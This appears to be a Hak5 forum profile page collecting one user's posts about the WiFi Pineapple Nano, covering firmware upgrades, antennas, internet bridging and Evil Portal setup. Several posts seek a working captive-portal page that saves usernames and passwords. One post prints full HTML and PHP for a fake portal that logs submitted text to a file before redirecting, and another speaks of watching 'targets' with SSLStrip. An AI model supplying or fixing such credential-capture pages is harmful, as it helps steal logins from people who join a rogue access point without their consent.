Jump to content

kingoddball

Active Members
  • Posts

    24
  • Joined

  • Last visited

Posts posted by kingoddball

  1. Hello!

    I've not used my Pineapple in a very long time (maybe close to 6 months).

    Noticed a lot of changes and a whole new EvilPortal :)

    I'm not the the best with setting up pages; I did have a working NoDogSplash/EvilPortal page working earlier this year, but this isn't working now...

    (the nano stalled/crashed during the 1.1.2 upgrade and had to do a system reboot and lost the data on the device.)

    Does anyone have a working EP page with user/pass, login then redirect to wherever needed [ie: Google]?

    If you do, are you able to help me out and give me the working page/PHP etc and tell me where to put it [dir etc].

    All I need is just a basic page, doesn't need anything except a login/pass (save user/pass) then auth to allow login - I'm sure someone has one they can dump for me?

    I just cannot remember anything on this and pages are a little mixed with old, new and mixed data.

     

     

    PLEASE HELP :wub:

  2. Hey!
    Long time since I have used my Pineapple.

    Powered on today, updated and once it rebooted all of my data was gone (AP list, password files and SSID pool etc).

    I don't think I can get the back, which is a shame but is this a normal course of action for upgrades?

    Or any way to get these back (internal) or any way to prevent loss next time?

     

    edit: It's also running at 100% CPU quite a lot, never before?

  3. what multirom app are you using on your 6P?

    Multi-Rom!! http://forum.xda-developers.com/nexus-6p/development/mod-multirom-v33-beta-1-t3313291

    Beta 4 works fine.

    Fingerprint only works on internal rom and may never work on secondaries (small price to pay!).

    Edit: if you're not on a nexus, you might have to compile the git yourself for your Arm64 device (if you need it).

  4. Original/Current devices:

    Dell Laptop - Kali

    iPhone 6+

    New Toy this week:

    Nexus 6P

    Mods to N6P:

    Multi-Rom (64Bit)

    • 1st: Stock OS
    • 2nd: Own compiled CyanogenMod (13.0) distro.

    Dev Options enabled (CM13)

    Pineapple software (not tried this yet)

    Pineapple:

    Tactical setup

    Extra wifi dongle (5370 ralink IIRC)

  5. Thanks mate,

    I saw that thread lastnight. Wasn't really much I saw. I was seeing wp6.sh and stuff and a reference to firmware issue - Didn't see an actual issue.

    So a side, if search was used what am I looking for?

    Doesn't seem like a straight issue, could be PHP was wrong, config not knowing where *.php is, html is wrong, could have been anything.

    Search doesn't really work for me as I came across a whole lot of threads and didn't get too much.

    Edit: on top of that, it says there's an issue with firmware - doesn't say what firmware the issue is with, could be 1.0.5 or lower? I don't know the frequency of the release times are. Search doesn't always yield results if there are not definite details.

    So... Posting a topic didn't seem all that harmful. Thanks :blink:

  6. Hi Again!

    So far it's been fun learning how all this works!

    I'm stuck on Evil AP - I copied the guide from https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/and made the landing page/splash.html and made the capture.php but nothing is logged.

    I just used copy/paste and also used the YouTube video and copied that but still no data is captured.

    I'm not sure if EvilAP/Nodog knows that the file is in /www? I didn't see anything about telling EvilAP where anything is? I don't see any config files in NANO version (like what's shown in the Pineapple V version).

    If anyone can help, that would be great!!

    The code looks correct (copy and paste plus a review) but no "stored.txt" is created, nothing logged.

    I'm thinking it's something like nodogsplash cannot see the file in /www? I'm just not sure how or where I can link it? Just a little stuck.

    splash.html:

    <html>
    <head>
    <title>$gatewayname Entry</title>
    <meta HTTP-EQUIV="Pragma" CONTENT="no-cache">

    <script type="text/javascript">

    function submitTextToCapture() {

    text = document.getElementById("userText").value;

    window.location = "http://172.16.42.1/capture.php?text=" + text + "&redir=$authtarget";

    }

    </script>

    </head>
    <body bgcolor="#DDDDDD" text="#000000">
    <table border="0" cellpadding="2" cellspacing="0" width="100%">
    <tr>
    <td align=center>
    <h2>$gatewayname</h2>
    </td>
    </tr>
    <tr>
    <td align=center height="120">

    <p>Enter some text to continue</p>

    <form id="textForm">

    <input type="text" id="userText" placeholder="enter some text" required>
    <button type="button" id="button" onclick="submitTextToCapture()">Send Text</button>

    </form>

    <a href="$authtarget">
    <img src="$imagesdir/wifidog.png" width="71" height="49" border="0"
    alt="Click to enter" title="Click to enter">
    </a>
    </td>
    </tr>
    </table>
    </body>
    </html>

    /www/capture.php:

    <?php

    $text
    = $_GET["text"];
    $redir = $_GET["redir"];

    $file = fopen("stored.txt", "a");
    fwrite($file, $text . "\n");
    fclose($file);

    echo '<script type="text/javascript">window.location = "' . $redir . '"</script$

    ?>

  7. Hi Again!

    I have a question on antennas.

    In built up urban area's I'd like to show as little as possible and want to try out some stubby antennas, will this cause any issue with the hardware?

    Around 2.5cm (1inch) in size. In my head it should be fine, but after some better advise than me guessing.

    I don't care about decreased range.

    Also are dome's possible to use?

    The below pics are just example photos.

    2.4Ghz-Circular-Polarized-Omni-Cloud-Spi42371.jpgW24-RSMA-M.jpg

  8. Hi Terry,

    Not sure if you've done this already - set your nexus to become a wifi access point (enable wireless AP, whatever its called) and then goto pineapple network settings, connect to that newly created access point and then just open browser to the pineapple's IP.

    Should take nothing more than that.

    * Enable internet sharing/hot spot

    * Connect to hotspot in network under pineapple network settings

    * Open browser and enter IP, user and pass.

    I'm doing this same thing on my iPhone (I'll grab a 6P this month!).

    Enjoy, if it doesn't work, please reply back and i'll try help some more.

  9. Hello,

    Just a quick one, I have seen a few videos showing how to connect one of the onboard wireless cards to a wifi network to allow internet to machines that have joined my pineapple...

    but how do I do this on the pineapple Nano?

    Can I connect to a network in the GUI?

    Also if I can, is it possible to use a 3rd wireless card (RT5730 dongle) to connect to said network?

    Sorry for the obvious questions, just very new with this.

    So far I'm enjoying it! Thanks Hak5 and community! :)

  10. Hello,

    Sorry for the potentially overdone question but I'm extremely new to this device.

    So, if someone is willing to help.

    What I'd like to do; add a wifi dongle to the button USB port so this device can connect to my wifi and allow incoming connection to access the internet (no wired connection wanted).

    I'm sure someone can translate my poor words ;)

    Essentially - wlan0 is the pineapple's antenna and devices (targets joined hehe) will connect to this and wlan1 will be connected to my wifi and allow them access (SSLStrip etc to watch).

    Is this possible?

    I only have this device and I'm waiting for the Nano to get a cheaper shipping method (if ever, it's currently $66 USD to ship to me).

    Thank you all for taking the time!

×
×
  • Create New...